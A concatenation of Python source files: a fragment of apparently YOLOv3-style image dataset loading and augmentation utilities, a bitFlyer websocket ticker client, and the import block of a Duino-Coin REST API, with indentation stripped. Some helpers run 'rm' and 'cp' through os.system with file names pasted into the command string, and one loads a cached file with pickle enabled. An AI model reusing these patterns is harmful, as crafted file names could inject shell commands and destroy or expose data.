fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, pad=0.0):
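        # Builds the image/label file lists, computes rectangular-training batch
        # shapes when rect=True, and caches labels (and optionally images) in
        # memory.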
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32. + pad).astype(np.int) * 32
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
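        # Returns (CHW RGB image tensor, (n, 6) label tensor whose column 0 is
        # filled with the image index in collate_fn and columns 1:6 hold
        # [class, x, y, w, h] in normalized xywh, image path, shapes for COCO
        # mAP rescaling). Mosaic loading is used during training, otherwise a
        # letterboxed single image, with optional affine/HSV/flip augmentation.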
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
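def _hsv_lut_sketch():
    # Editor's illustrative sketch (not part of the original repo): shows how the
    # LUT-based gain in augment_hsv() above maps channel values, assuming a fixed
    # saturation gain of 1.2 instead of a random one. Pure numpy, no image I/O.
    import numpy as np
    x = np.arange(0, 256, dtype=np.int16)
    lut_sat = np.clip(x * 1.2, 0, 255).astype(np.uint8)
    # A pixel with saturation 200 maps to lut_sat[200] == 240; 250 clips to 255.
    return lut_sat[200], lut_sat[250]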
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=-s // 2) # border to remove
return img4, labels4
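def _mosaic_placement_sketch():
    # Editor's illustrative sketch (not part of the original repo): the top-left
    # tile arithmetic from load_mosaic() above, assuming s=416, a mosaic centre at
    # (xc, yc) = (500, 450) and a 300x400 (h x w) source image.
    s, xc, yc, h, w = 416, 500, 450, 300, 400
    canvas = s * 2                                               # 832x832 mosaic canvas
    x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # (100, 150, 500, 450)
    x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # (0, 0, 400, 300)
    padw, padh = x1a - x1b, y1a - y1b                            # (100, 150)
    # The whole source image lands in img4[150:450, 100:500] of the canvas, and the
    # padw/padh offsets shift its label boxes into canvas coordinates.
    return canvas, (x1a, y1a, x2a, y2a), (x1b, y1b, x2b, y2b), (padw, padh)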
def letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
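def _letterbox_dims_sketch(h0=720, w0=1280, new_shape=416, stride=64):
    # Editor's illustrative sketch (not part of the original repo): the padding
    # arithmetic of letterbox() above with auto=True, for an assumed 720x1280 input.
    # Pure arithmetic, no image I/O.
    import numpy as np
    r = min(new_shape / h0, new_shape / w0)              # scale ratio (new / old)
    new_unpad = int(round(w0 * r)), int(round(h0 * r))   # resized (w, h) = (416, 234)
    dw, dh = new_shape - new_unpad[0], new_shape - new_unpad[1]
    dw, dh = np.mod(dw, stride), np.mod(dh, stride)      # minimum-rectangle padding
    return new_unpad, (dw / 2, dh / 2)                   # ((416, 234), (0.0, 27.0))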
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
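def _affine_warp_sketch():
    # Editor's illustrative sketch (not part of the original repo): warping one box
    # corner with a combined matrix as in random_affine() above, assuming a pure
    # 90-degree rotation about the origin for readability.
    import numpy as np
    M = np.eye(3)
    M[:2, :2] = [[0, -1], [1, 0]]            # rotation only, no translation/shear
    corner = np.array([10.0, 20.0, 1.0])     # homogeneous point (x, y, 1)
    x_new, y_new = (corner @ M.T)[:2]        # -> (-20.0, 10.0)
    return x_new, y_new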
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
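def _bbox_ioa_sketch():
    # Editor's illustrative sketch (not part of the original repo): the
    # intersection-over-area test used by cutout() above, for one hand-picked
    # mask/label pair. The label keeps less than 60% of its area covered, so it survives.
    mask = (0, 0, 50, 50)                     # x1, y1, x2, y2 of the cutout box
    label = (25, 25, 75, 75)                  # x1, y1, x2, y2 of the object box
    inter = max(0, min(mask[2], label[2]) - max(mask[0], label[0])) * \
            max(0, min(mask[3], label[3]) - max(mask[1], label[1]))   # 25 * 25 = 625
    label_area = (label[2] - label[0]) * (label[3] - label[1])        # 50 * 50 = 2500
    return inter / label_area                 # 0.25 < 0.60 -> label is kept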
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
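def _xywh_to_pixel_xyxy_sketch():
    # Editor's illustrative sketch (not part of the original repo): the
    # normalized-xywh -> pixel-xyxy conversion done in __getitem__ above, for one
    # box on an assumed 640x480 (w x h) image with ratio=(1, 1) and pad=(0, 0).
    w, h = 640, 480
    cls, xc, yc, bw, bh = 0, 0.5, 0.5, 0.25, 0.5
    x1, y1 = w * (xc - bw / 2), h * (yc - bh / 2)   # (240.0, 120.0)
    x2, y2 = w * (xc + bw / 2), h * (yc + bh / 2)   # (400.0, 360.0)
    return cls, x1, y1, x2, y2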
|
realtime.py
|
from typing import Callable, Dict, Optional
import json
import time
import logging
from threading import Thread
import websocket
from websocket import WebSocketApp, WebSocketConnectionClosedException
from bitflyer.enumerations import ProductCode, Channel, PublicChannel
from bitflyer.responses import Ticker
logger = logging.getLogger(__name__)
class BitFlyerRealTime:
ENDPOINT = 'wss://ws.lightstream.bitflyer.com/json-rpc'
def __init__(self) -> None:
websocket.enableTrace(False)
self._ws_app = websocket.WebSocketApp(
self.ENDPOINT,
on_open=self._on_open,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
)
self._thread: Optional[Thread] = None
self._to_stop = True
self._message_handler_of: Dict[str, Callable] = {}
def stop(self) -> None:
self._to_stop = True
self._ws_app.close()
def start(self) -> None:
self._to_stop = False
logger.info('websocket server is now starting')
def run(ws: WebSocketApp) -> None:
while True:
if self._to_stop:
break
ws.run_forever(ping_interval=30, ping_timeout=10)
time.sleep(1)
t = Thread(target=run, args=(self._ws_app,))
t.start()
self._thread = t
logger.info('websocket server has started')
def is_alive(self) -> bool:
return self._thread is not None and self._thread.is_alive()
def subscribe(self, channel: Channel, product_code: ProductCode, handler: Callable) -> None:
channel_name = f'{channel.name}_{product_code.name}'
self._message_handler_of[channel_name] = handler
try:
self._subscribe(channel_name)
except WebSocketConnectionClosedException:
pass
def _subscribe(self, channel: str) -> None:
self._ws_app.send(json.dumps({
'method': 'subscribe',
'params': {'channel': channel},
}))
def _on_message(self, _: WebSocketApp, json_str: str) -> None:
msg = json.loads(json_str)
params = msg['params']
channel: str = params['channel']
message = params['message']
handler = self._message_handler_of[channel]
if channel.startswith(PublicChannel.lightning_ticker.name):
handler(Ticker.from_dict(message))
def _on_error(self, _: WebSocketApp, error) -> None:
logger.error(error)
def _on_close(self, _: WebSocketApp) -> None:
logger.info('connection closed')
def _on_open(self, _: WebSocketApp):
for c in self._message_handler_of.keys():
logger.info(f'`{c}` has been subscribed')
self._subscribe(c)
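if __name__ == '__main__':
    # Editor's illustrative usage sketch (not part of the original module).
    # Assumes the bitflyer enums imported above expose PublicChannel.lightning_ticker
    # and ProductCode.BTC_JPY; subscribing before start() is fine because the
    # subscription is stored and replayed in _on_open once the socket connects.
    logging.basicConfig(level=logging.INFO)
    client = BitFlyerRealTime()
    client.subscribe(PublicChannel.lightning_ticker, ProductCode.BTC_JPY,
                     lambda ticker: print(ticker))
    client.start()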
|
app.py
|
#!/usr/bin/env python3
"""
Duino-Coin REST API © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duco-rest-api
Duino-Coin Team & Community 2019-2021
"""
import gevent.monkey
gevent.monkey.patch_all()
from werkzeug.utils import secure_filename
import string
import secrets
from datetime import timedelta
from functools import reduce
from time import time
from dotenv import load_dotenv
import base64
import functools
from flask_caching import Cache
from flask import Flask, request, jsonify, render_template
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from flask_ipban import IpBan
from socket import socket
import json
import random
import requests
from bitcash import Key
from cashaddress import convert
from tronapi import Tron
from tronapi import HttpProvider
from nano_lib_rvx import Account
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import ssl
import smtplib
from colorama import Back, Fore, Style, init
from re import sub, match
from random import randint, choice
from time import sleep, time
from sqlite3 import connect as sqlconn
from bcrypt import hashpw, gensalt, checkpw
from json import load
import os
import traceback
import threading
from hashlib import sha1
from xxhash import xxh64
